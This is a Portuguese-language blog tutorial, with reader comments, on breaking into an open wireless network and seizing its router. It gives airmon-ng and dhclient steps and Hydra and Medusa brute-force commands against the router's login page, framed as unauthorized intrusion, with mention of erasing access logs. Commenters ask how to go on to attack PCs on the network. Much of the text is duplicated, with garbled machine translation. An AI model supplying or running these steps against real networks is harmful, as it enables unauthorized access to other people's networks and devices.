Então e agora que vc ja conseguiu invadir A REDE como apagar os logs de acesso do seu pc no roteador?
ou se precisar reiniciar o roteador???
entao hj vou passar um tuto como invadir o roteador
tomando controle total da rede wireless
vamos la
nesse tutorial eu utilizei uma versão do linux
o backtrack 4 mas vc pode usar o velho windows com programas de brute force
detalhes
a autenticacao tem q estar aberta
e o dhcp ativado
passos resumidos:
indentificar a rede
ter acesso a rede
obter um endereço ip
verificar o gateway
verificar o caminho da pagina de configuracao do roteador
iniciar Hydra/ Medusa usando wordlist para o login e senha caso o login n seja conhecido(no caso os default)
ou se precisar reiniciar o roteador???
entao hj vou passar um tuto como invadir o roteador
tomando controle total da rede wireless
vamos la
nesse tutorial eu utilizei uma versão do linux
o backtrack 4 mas vc pode usar o velho windows com programas de brute force
detalhes
a autenticacao tem q estar aberta
e o dhcp ativado
passos resumidos:
indentificar a rede
ter acesso a rede
obter um endereço ip
verificar o gateway
verificar o caminho da pagina de configuracao do roteador
iniciar Hydra/ Medusa usando wordlist para o login e senha caso o login n seja conhecido(no caso os default)
vamos la:
primeiro comando
airmon-ng start wlan0 // deixa sua placa em modo monitor
airodump-ng mon0 -t opn
primeiro comando
airmon-ng start wlan0 // deixa sua placa em modo monitor
airodump-ng mon0 -t opn
ficará assim:
o segundo comando:
ifconfig wlan0 down
iwconfig wlan0 essid default channel 1 iwconfig wlan0 essid um canal padrão
iwconfig ap 00:13:D4:09:32:60 iwconfig ap 00:13: D4: 09:32:60
ifconfig wlan0 up ifconfig wlan0 up
preste atenção na imagem vc vai entender!
ifconfig wlan0 down
iwconfig wlan0 essid default channel 1 iwconfig wlan0 essid um canal padrão
iwconfig ap 00:13:D4:09:32:60 iwconfig ap 00:13: D4: 09:32:60
ifconfig wlan0 up ifconfig wlan0 up
preste atenção na imagem vc vai entender!
Verificar a conexão
iwconfig wlan0
iwconfig wlan0
Obter um endereço IP e gateway
dhclient wlan0
dhclient wlan0
Antes de mais nada verifique
os logins padroes do roteador
os logins padroes do roteador
caso não encontre
vc vai parar nessa pagina, mais ou menos
vc vai parar nessa pagina, mais ou menos
entaão caso tenha tentado e n tenha conseguido vamos la...vc vai precisar de uma word list eu uso o dicionario do broffice muito bom.
Começando Hydra para quebrar o login router / senha.
-L specifiying the path to login list -L especificando o caminho para login lista
-P specifying the path to password list -P especificando o caminho para a lista de senhas
-t limiting the number of connections T limitar o número de conexões
-e ns to check for no password and to check login as password ns-e para verificar se nenhuma senha e login para verificar como senha
-f to stop when first login/password is found -F para parar quando primeiro login / password é encontrado
-V to show each login/password attempt -V para mostrar cada login / tentativa de senha
http-get to specify the protocol to use http-get para especificar o protocolo a ser usado
/index.asp to point to the webpage it is heading to / Index.asp para apontar para a página que está indo para
hydra 192.168.1.1 -L /wordlists/login.txt -P /wordlists/ap_password.txt -t 1 -e ns -f -V http-get /index.asp
Começando Hydra para quebrar o login router / senha.
-L specifiying the path to login list -L especificando o caminho para login lista
-P specifying the path to password list -P especificando o caminho para a lista de senhas
-t limiting the number of connections T limitar o número de conexões
-e ns to check for no password and to check login as password ns-e para verificar se nenhuma senha e login para verificar como senha
-f to stop when first login/password is found -F para parar quando primeiro login / password é encontrado
-V to show each login/password attempt -V para mostrar cada login / tentativa de senha
http-get to specify the protocol to use http-get para especificar o protocolo a ser usado
/index.asp to point to the webpage it is heading to / Index.asp para apontar para a página que está indo para
hydra 192.168.1.1 -L /wordlists/login.txt -P /wordlists/ap_password.txt -t 1 -e ns -f -V http-get /index.asp
Para Medusa
-H para especificar o host
-U to specify path to the login wordlist -U para especificar o caminho para a wordlist login
-P to specify path to password wordlist -P para especificar caminho para wordlist senha
-t to limit the number of connections -T para limitar o número de conexões
-f to stop the test on finding a valid login/password -F para parar o teste em encontrar um login / password
-v for a more verbose output -V verbose para uma saída mais
-M to specify the module to use -M para especificar o módulo para usar
-m to specify the options for the module in use -M para especificar as opções para o módulo em uso
medusa -h 192.168.1.1 -U /wordlists/login.txt -P /wordlists/ap_password.txt -t 1 -e ns -f -v 5 -M http -m DIR:GET/index.asp
-H para especificar o host
-U to specify path to the login wordlist -U para especificar o caminho para a wordlist login
-P to specify path to password wordlist -P para especificar caminho para wordlist senha
-t to limit the number of connections -T para limitar o número de conexões
-f to stop the test on finding a valid login/password -F para parar o teste em encontrar um login / password
-v for a more verbose output -V verbose para uma saída mais
-M to specify the module to use -M para especificar o módulo para usar
-m to specify the options for the module in use -M para especificar as opções para o módulo em uso
medusa -h 192.168.1.1 -U /wordlists/login.txt -P /wordlists/ap_password.txt -t 1 -e ns -f -v 5 -M http -m DIR:GET/index.asp
Massa manow!!!
ResponderExcluirAjudou me bastante!
muito bom, existe alguma maneira de se invadir a rede pra poder rodar os exploits e invadir o pc da rede?
ResponderExcluirpessoal, preciso de uma wordlist, para acessar um roteador. se alguem puder me enviar, agradeço. gostei muito, das explicaçoes, gama693@yahoo.com.br aguardo.
ResponderExcluir